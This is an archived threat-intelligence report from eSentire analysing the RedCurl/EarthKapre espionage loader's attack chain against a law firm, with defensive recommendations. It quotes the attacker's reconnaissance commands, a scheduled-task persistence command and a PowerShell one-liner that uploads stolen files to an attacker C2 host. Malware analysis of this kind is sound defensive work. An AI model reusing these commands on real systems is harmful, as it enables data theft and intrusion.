{
	"id": "2b2dde75-b965-4c66-8792-29edd9643769",
	"created_at": "2026-04-06T00:19:52.817159Z",
	"updated_at": "2026-04-10T03:30:34.688738Z",
	"deleted_at": null,
	"sha1_hash": "18d578ca9d7b9eb8703328ab28b70a9ba3030220",
	"title": "Unraveling the Many Stages and Techniques Used by RedCurl/EarthKapre APT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1921545,
	"plain_text": "Unraveling the Many Stages and Techniques Used by\r\nRedCurl/EarthKapre APT\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 17:50:30 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nIn January 2025, the eSentire Threat Response Unit (TRU) identified the use of a legitimate Adobe executable\r\n(ADNotificationManager.exe) to sideload the EarthKapre/RedCurl loader.\r\nEarthKapre, also known as RedCurl, is a highly sophisticated cyber espionage group known for its advanced\r\noperations, primarily targeting private-sector organizations with a focus on corporate espionage. 
The target of this\r\nattack is an organization within the Law Firms \u0026 Legal Services industry.\r\nUpon execution of the final stage, TRU observed EarthKapre executing reconnaissance commands and tools like\r\nSysInternals Active Directory Explorer (AD Explorer), the usage of 7-Zip to password protect/archive the\r\ncollected data, and exfiltration to cloud storage provider “Tab Digital” via PowerShell PUT request.\r\nInitial access occurred when the victim opened an Indeed CV/cover-letter-themed PDF from a spam email.\r\nThe PDF contains a link to download a zip archive, which contains a mountable ISO (img) file. Once the victim\r\nopens the img file, it is mounted to an external drive letter, e.g. D:, and opens in File Explorer.\r\nThe victim sees a single file, “CV Applicant *.scr”, which is the legitimate signed Adobe executable\r\n“ADNotificationManager.exe”. After the victim opens the file, the EarthKapre loader (netutils.dll) is sideloaded.\r\nThis attack chain is described in the figure below.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 1 of 21\n\nFigure 1 – EarthKapre/RedCurl Attack Chain\r\nThe PDF file contains two links that lead to a zip archive containing an ISO image file matching “CV Applicant\r\n[4 digits]-[6 digits].img”.\r\nFigure 2 – Indeed-themed phishing pdf\r\nAfter extracting the zip archive and mounting the img file, the victim sees a File Explorer window. Note, the victim\r\nwould not see any of the hidden files shown below as the default setting in Windows hides hidden files. The only\r\nfile the victim sees is “CV Application *.scr”.\r\nUpon the victim opening the *.scr file, the RedCurl/EarthKapre DLL (netutils.dll) is sideloaded. 
The legitimate C\r\nruntime libraries shown below are also loaded.\r\nFigure 3 – File explorer view after mounting img file\r\nStage 1 Analysis\r\nBefore we dive into the analysis of the first stage, aka Simple Downloader, it is worth noting there are few\r\ndetections in VirusTotal for this particular variant.\r\nFigure 4 – Low VirusTotal hits\r\nThe purpose of the first stage is to download and execute the next stage. As previously reported by Trend Micro,\r\nRedCurl/EarthKapre uses a string decryption function that relies on various APIs in bcrypt.dll. These\r\nAPIs are used to generate a SHA256 hash of a string. The first 16 bytes of the generated SHA256 hash are\r\nused as the AES key for decrypting strings via BCryptDecrypt:\r\nBCryptOpenAlgorithmProvider – AES/SHA256\r\nBCryptCreateHash\r\nBCryptHashData\r\nBCryptDestroyHash\r\nBCryptGenerateSymmetricKey – Generate key for AES\r\nBCryptFinishHash – Acquire SHA256 of key string\r\nBCryptDecrypt – Decrypt encrypted string\r\nBCryptGetProperty – ObjectLength and HashDigestLength properties\r\nBCryptDestroyKey\r\nBCryptCloseAlgorithmProvider\r\nThe key string used in the aforementioned process is itself XOR encrypted. The routine that decrypts it is\r\ncalled with several parameters: a pointer to store the decrypted key, a pointer to the encrypted key, and the\r\nXOR key 0x0D0196A9 to use for decryption.\r\nNote, this routine is used throughout several stages of RedCurl/EarthKapre, not just this particular stage. It is\r\nalso used for decrypting other strings, not just the key string.\r\nFigure 5 – AES key decryption\r\nThe XOR decryption routine can be seen below. 
Each index of the encrypted data is decrypted by multiplying the\r\nconstant 48271 by the previous computation and XOR’ing the result against the encrypted byte.\r\nFigure 6 – XOR decryption routine\r\nAfter the AES key string is decrypted, it is used throughout for decrypting strings. The next figure displays part of\r\nhow this is achieved.\r\nFirst, a SHA256 hash is generated from the key string, and 16 bytes of the resulting hash are used in a call to\r\nBCryptDecrypt.\r\nFigure 7 – AES decryption routine\r\nTo make understanding the code easier, we wrote a Python script that is available here to find the AES key,\r\ndecrypt all the strings, and set comments in IDA Pro.\r\nNote, the YARA rules may need to be updated across future variants to capture the appropriate opcodes. For this\r\nparticular variant, all of the strings are decrypted and output in IDA as seen below. These strings include various\r\nAPI names, a C2 URL (sm.vbigdatasolutions.workers[.]dev) and a user agent utilized for acquiring the next stage.\r\nRemembering that the initial PDF was Indeed-themed, the string “https://secure.indeed.com/auth” is passed in a\r\ncall to the API ShellExecuteA to deceive the user by opening their default browser to that URL.\r\nFigure 8 – Decrypting strings via EarthKapre-IDA.py\r\nOne of the first behaviors in this stage is to create a scheduled task via the COM interface (taskschd.dll). The trigger\r\ntime is generated via the Windows API GetSystemTimeAsFileTime, which is then converted to the time in seconds\r\nsince epoch. 
The time is then converted to string format via strftime with the format specifier \"%Y-%m-%dT%H:%M:%S\".\r\nFigure 9 – Generate time for scheduled task to trigger\r\nNote that because the trigger time for the task technically lies in the past by the time the task is\r\ncreated, it is not immediately triggered. The task is set to run every hour indefinitely, so the next\r\nstage actually runs one hour later.\r\nThe threat actors are still using the LOLBin Program Compatibility Assistant (pcalua.exe) for the next stage,\r\nwhich in turn will execute the “CplApplet” export via rundll32.exe.\r\nThe \"action\" for the task is as follows:\r\nAction: Start a Program\r\nDetails: C:\\Windows\\system32\\pcalua.exe -a rundll32 -c shell32.dll,Control_RunDLL\r\nC:\\Users\\User\\AppData\\Roaming\\BrowserOSR\\BrowserOSR_.dll c7ccd991-41e1-45ab-b0de-b1d229bba429\r\nThe following figure displays the name of the scheduled task, which follows the format BrowserOSR-\u003cBASE64_ENCODED_COMPUTER_NAME\u003e.\r\nNote, the computer name is acquired through the API GetComputerNameA. One additional thing to note is that\r\nthis task is not stored in the root but rather in its own folder “BrowserOSR”, and it uses the author “Google\r\nCorporation”.\r\nFigure 10 – Scheduled task properties\r\nWininet.dll is then loaded and several APIs are resolved:\r\nInternetOpenA\r\nInternetConnectA\r\nHttpOpenRequestA\r\nHttpSendRequestA\r\nHttpQueryInfoA\r\nThese APIs are used by the malware to send an HTTP request to the C2 to acquire the next stage. The contents of\r\nthis HTTP request can be seen below. Note, the user agent changes across variants. 
For example, the user agent\r\n“Mozilla/5.0 (Windows NT; Windows NT 10.0;) WindowsPowerShell/5.1.20134.790” was seen in a previous\r\nvariant.\r\nPOST /id HTTP/1.1\r\nContent-type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0;) WindowsPowerShell/5.1 (VuMUAsryhPLsaqGXlSx)\r\nHost: sm.vbigdatasolutions[.]workers.dev\r\nContent-Length: 0\r\nCache-Control: no-cache\r\nFigure 11 – First stage C2 HTTP request\r\nThe following figure shows the response from the C2, which contains the encrypted second stage payload. Note,\r\nthe file name in the Content-Disposition header is set to a randomly named zip archive; however, the response\r\ncontents are clearly missing the right header to be a zip archive.\r\nFigure 12 – First stage C2 HTTP response\r\nThe API InternetReadFile is called in a loop to read the response from the HTTP request in chunks of 0x2800\r\nbytes until InternetReadFile returns FALSE. This response contains an encrypted DLL payload. The payload\r\nreturned by the C2 in this case is 0x428A0 bytes, so the InternetReadFile API is called around 26 times.\r\nFigure 13 – Read response from C2 in chunks of 0x2800 bytes\r\nWe have re-implemented the decryption process in the Python script available here. Note, the first stage binary,\r\ni.e., netutils.dll, needs to be passed to the script for the script to identify the XOR key to decrypt the encrypted\r\npayload, e.g., encrypted_payload.bin.\r\nFigure 14 – Decrypting the C2 encrypted response via EarthKapre-Stage2-Payload-Decrypter.py\r\nNext, the string \"CreateDirectoryA\" is decrypted and resolved via GetProcAddress. Then, the string \"WriteFile\" is\r\ndecrypted and resolved via GetProcAddress. 
After that, the string \"CreateFileA\" is decrypted and resolved via\r\nGetProcAddress. Then, the string \"CloseHandle\" is decrypted and resolved via GetProcAddress.\r\nNext, CreateDirectoryA is called to create the folder to store the payload:\r\nC:\\Users\\user\\AppData\\Roaming\\BrowserOSR\r\nAfter that, CreateFileA is called with GENERIC_WRITE access\r\nto create a handle to the final stage. The payload is then decrypted via an XOR loop with the hard-coded XOR key\r\n\"BmaEiOwsUa\". The beginning of the decrypted blob contains 0x1869F junk bytes.\r\nAfter incrementing the pointer to the payload buffer by 0x186A0 bytes, the payload is written to disk through a call\r\nto WriteFile. Finally, when the scheduled task triggers an hour later, stage 2 executes.\r\nFigure 15 – Decrypting the C2 encrypted response via XOR key, write payload to disk\r\nFigure 16 – Decrypted payload preview in hex editor\r\nStage 2 Analysis\r\nThe same string decryption techniques described in the first stage are used again, but the key for AES decryption\r\nis derived differently. The first part of the key string is acquired through XOR decryption like before; however, the\r\nGUID that was passed when this stage was executed is concatenated with this string, e.g.,\r\n\"CnWX8J4d5Wizuwc7ccd991-41e1-45ab-b0de-b1d229bba429\".\r\nBecause of this, sandboxes that rely on executing all known exports of the DLL will fail to detonate this stage\r\nproperly.\r\nFigure 17 – Decrypting stage 2 strings via EarthKapre-IDA.py\r\nThe first decrypted string we will talk about is “www.msn.com”. This is used to check whether the victim machine has\r\ninternet access; otherwise, the malware will exit. Note, TRU has observed other domains, such as\r\nbing.com, used in this process as well. 
The HTTP request contents are as follows. If the response code is less than 400, internet access is\r\nconsidered to be available.\r\nGET https://www.msn.com/ HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Sa\r\nPragma: no-cache\r\nHost: www.msn.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nFigure 18 – Internet availability check via msn.com\r\nNext, the malware resolves the victim's username via the GetUserNameA API and computer name via the\r\nGetComputerNameA API. This is followed by getting the directory paths for Program Files, Desktop, and Local\r\nAppData via the SHGetSpecialFolderPathA API.\r\nFigure 19 – Get Program Files, Desktop, and Local AppData paths\r\nThe malware then calls the API SetFileApisToOEM for the process to use the OEM character set code page, then\r\nproceeds to get all file and directory names in Program Files, Desktop, and Local AppData via API calls to\r\nFindFirstFileA and FindNextFileA. The resulting data is concatenated with newlines.\r\nNext, the malware generates an XOR key to use for encrypting the HTTP request payload’s values. The routine\r\nthat generates the key is a string generator that makes use of the rand() function.\r\nNote, the seed is set to the current process ID multiplied by a constant. With this particular sample, the constant\r\nwas 0x679BCF5C.\r\nFigure 20 – Setting seed via srand\r\nThe HTTP request payload contains several key/value pairs containing the victim's computer name, username,\r\nenumerated files/directories, the final stage’s export to be called, and finally the XOR key used to encrypt each\r\nvalue in the key/value pairs. Note, some of the key values are hard-coded or empty. 
Note, the key names, e.g.\r\n“wbpslyzvnir”, are generated using the previously mentioned string generator.\r\nPOST https://community.rmobileappdevelopment.workers[.]dev/ HTTP/1.1\r\nContent-type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Sa\r\nHost: community.rmobileappdevelopment.workers[.]dev\r\nContent-Length: 1166\r\nCache-Control: no-cache\r\nwbpslyzvnir=\u0026mplya=\u0026dfdxkzkvbuqtxb=\u0026ndpqpeqwcxbbltixpw=1\u0026thtpupwphzvzd==\u0026waqjikiphmzl=\u0026ggzykfgzwoavgyss=\r\nFigure 21 – Stage 2 C2 request\r\nThe routine responsible for encrypting the values has been decompiled and can be seen below.\r\nFigure 22 – XOR encryption routine\r\nThe random string generator routine can be seen below. As stated before, this generator is used to generate the\r\nXOR key, as well as the random strings used as keys in the request payload. The rand() function is called in a\r\nloop; each result is taken modulo 0x1A and 0x61 is added, which yields a lowercase ASCII letter.\r\nFigure 23 – Random string generator routine\r\nEach value of the HTTP request is then base64 encoded. 
Note, the base64 encoding routine complies with “Base 64 Encoding with URL and Filename Safe Alphabet” defined in RFC 4648, which has the following character set:\r\n ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-\r\nFigure 24 – Base64 character set\r\nAfter decoding from base64 and decrypting each value with the XOR key in the HTTP request payload, we can\r\nsee what the threat actors receive on their end: the victim’s username, computer name, and files/directories from\r\nthe victim’s Desktop, Local AppData, and Program Files folders.\r\nFigure 25 – Decrypted HTTP request contents\r\nIf the request to the C2 was successful, the string \"IsDebuggerPresent\" is then decrypted and resolved via\r\nGetProcAddress. It is then called to check if a debugger is present. If a debugger is detected, the process exits. Otherwise,\r\na random string is generated and \".tmp\" is concatenated to it.\r\nThe C2 response is then checked via HttpQueryInfoA, passing the flags HTTP_QUERY_FLAG_NUMBER and\r\nHTTP_QUERY_CONTENT_LENGTH. The content length is checked to ensure it is greater than 10 bytes. If so,\r\nInternetReadFile is called in a loop, reading in chunks of 0x2800 bytes again like in the first stage.\r\nThe response data is then written to the current directory under the file name formed by the random string + \".tmp\". This is achieved through\r\nthe APIs GetCurrentDirectoryA, CreateFileA, and WriteFile.\r\nFigure 26 – Check for debugger and exit\r\nThe aforementioned payload is then loaded via LoadLibraryA and the stage 3 export \"IfIxStId\" is resolved via\r\nGetProcAddress and is invoked through a call instruction. 
Finally, as an evasive measure, DeleteFileA() is then\r\ncalled to delete the third stage file from disk.\r\nNote, the stage 3 export name can be found as a decrypted string in this stage or passed as a value in the\r\nHTTP request payload.\r\nFigure 27 – Execute third stage retrieved from C2\r\nPutting everything together, we have created the following collection of scripts:\r\nEarthKapre-Stage1-C2.py - Simulates the request to the C2 to get the second stage.\r\nFigure 28 – Running EarthKapre-Stage1-C2.py to download second stage\r\nEarthKapre-Stage2-Payload-Decrypter.py - Decrypts the resulting encrypted payload acquired after running\r\nEarthKapre-Stage1-C2.py.\r\nFigure 29 – Running EarthKapre-Stage2-Payload-Decrypter.py to decrypt encrypted second stage\r\nEarthKapre-Stage2-C2-Request-Decrypter.py - Parses a given byte string containing the stage 2 request\r\npayload and outputs the decrypted victim computer name, username, files/directories listings, and XOR\r\nkey.\r\nFigure 30 – Running EarthKapre-Stage2-C2-Request-Decrypter.py to decrypt HTTP request payload\r\nEarthKapre-Stage2-C2.py - Sends a request to the C2 to retrieve the third stage.\r\nFigure 31 – Running EarthKapre-Stage2-C2.py to get third stage payload\r\nReconnaissance and Exfiltration\r\nRedCurl executed the following commands via a batch file dropped by the final stage into\r\n%APPDATA%\\Acquisition\\JKLYjn2.bat. 
This batch file is used to automate the collection of system information\r\nfor reconnaissance purposes and to archive collected data for exfiltration:\r\nGet user account information:\r\nnet localgroup\r\nnet localgroup Administrators\r\nGet system information:\r\nsysteminfo\r\nGet information about disks on the system:\r\nwmic logicaldisk get description,name,Size,FreeSpace\r\nGet information about installed Anti-virus products:\r\nwmic process get Name,Commandline powershell -c \"Get-CimInstance -Namespace\r\nroot/SecurityCenter2 -ClassName AntivirusProduct | Out-File -FilePath .\\temp7237\\\r\n\u003cCOMPROMISED_COMPUTER_NAME\u003e_AV.txt\"\r\nExecute Sysinternals AD Explorer and output results to temp file:\r\ntemp7237\\ad.exe -accepteula -snapshot \"\" temp7237\\dmn.dat\r\nExecute 7-Zip to archive collected data with a password for encryption:\r\npowershell -c \"gci .*.exe | foreach {if(($.VersionInfo).InternalName -eq '7za'){$syspack =\r\n$.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;\u0026$syspack\r\n$a1 $a2 $a3 $a4 $a5;\"\r\nUpload the collected data via PowerShell PUT request to C2 “mia.nl.tab[.]digital”:\r\npowershell -c \"$PSW01 = New-Object -ComObject MSXML2.ServerXMLHTTP;$AFS = New-Object -ComObject ADODB.Stream;$AFS.Open();$AFS.Type = 1;Get-ChildItem .$env:trdir |\r\nWhere-Object {$.PSIsContainer -eq $false;} | foreach {$AFS.LoadFromFile($.FullName);$AFB =\r\n$AFS.Read();$PSW01.Open('PUT', $env:davstr+'/'+$env:davfld+'/'+$_.Name, $False, $env:slog,\r\n$env:spass);$PSW01.Send($AFB);};$PSW01.Close;\"\r\nWorkers.dev\r\nThe C2 infrastructure is hosted by Cloudflare through Cloudflare Workers. 
According to Cloudflare, “Cloudflare\r\nWorkers provides a serverless execution environment that allows you to create new applications or augment\r\nexisting ones without configuring or maintaining infrastructure.”\r\nUnfortunately for RedCurl, there are some limitations to the Cloudflare Workers free tier: the threat actors are only\r\nable to receive 100,000 requests per day. Through slight modification of EarthKapre-Stage2-C2.py, we were able\r\nto cause the C2 to fail to return a response and ended up limiting all the other subdomains used in this attack as\r\nwell.\r\nFigure 32 – Cloudflare Workers limits\r\nWhat did we do?\r\nOur team of 24/7 SOC Cyber Analysts proactively isolated the affected host to contain the infection on the\r\ncustomer’s behalf.\r\nWe communicated what happened with the customer and helped them with incident remediation efforts.\r\nRecommendations from the Threat Response Unit (TRU):\r\nPrevent automatic mounting of ISO/IMG by Group Policy:\r\nCreate a new GPO policy or edit an existing one and enable the following policy: Computer\r\nConfiguration \u003e Administrative Templates \u003e System \u003e Device Installation \u003e Device Installation\r\nRestrictions.\r\nClick the Show... 
button and copy/paste the value shown below:\r\nSCSI\\CdRomMsft____Virtual_DVD-ROM_\r\nEnsure the checkbox \"Also apply to matching devices that are already installed.\" is selected.\r\nNote: when linking the GPO to an OU, the OU must be computer-based, as this policy is\r\nComputer Configuration based.\r\nUse an Endpoint Detection and Response (EDR) solution and ensure it is deployed across all workstations\r\nand servers.\r\nIndicators of Compromise\r\nYou can access the Indicators of Compromise here.\r\nReferences\r\nhttps://go.group-ib.com/report-redcurl-en\r\nhttps://www.trendmicro.com/en_ca/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nhttps://www.huntress.com/blog/the-hunt-for-redcurl-2\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Pcalua/\r\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. 
By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt"
	],
	"report_names": [
		"unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6ec2cd63-307d-4281-86da-5dc199e932af",
			"created_at": "2025-08-07T02:03:24.821494Z",
			"updated_at": "2026-04-10T02:00:03.843522Z",
			"deleted_at": null,
			"main_name": "GOLD BLADE",
			"aliases": [
				"Earth Kapre ",
				"Red Wolf ",
				"RedCurl "
			],
			"source_name": "Secureworks:GOLD BLADE",
			"tools": [
				"RedLoader"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f72f2981-0dc4-4d96-857c-a725a143a538",
			"created_at": "2024-03-21T02:00:04.724563Z",
			"updated_at": "2026-04-10T02:00:03.602417Z",
			"deleted_at": null,
			"main_name": "Earth Kapre",
			"aliases": [
				"RedCurl",
				"Red Wolf",
				"GOLD BLADE"
			],
			"source_name": "MISPGALAXY:Earth Kapre",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "79e95381-8008-48dc-b981-fd66e1c46ca6",
			"created_at": "2022-10-25T16:07:24.110478Z",
			"updated_at": "2026-04-10T02:00:04.869039Z",
			"deleted_at": null,
			"main_name": "RedCurl",
			"aliases": [
				"Earth Kapre",
				"Red Wolf"
			],
			"source_name": "ETDA:RedCurl",
			"tools": [
				"Impacket",
				"LaZagne"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8108d548-e30f-4b90-aa60-71323ba66678",
			"created_at": "2024-11-01T02:00:52.667098Z",
			"updated_at": "2026-04-10T02:00:05.343786Z",
			"deleted_at": null,
			"main_name": "RedCurl",
			"aliases": [
				"RedCurl"
			],
			"source_name": "MITRE:RedCurl",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434792,
	"ts_updated_at": 1775791834,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18d578ca9d7b9eb8703328ab28b70a9ba3030220.pdf",
		"text": "https://archive.orkl.eu/18d578ca9d7b9eb8703328ab28b70a9ba3030220.txt",
		"img": "https://archive.orkl.eu/18d578ca9d7b9eb8703328ab28b70a9ba3030220.jpg"
	}
}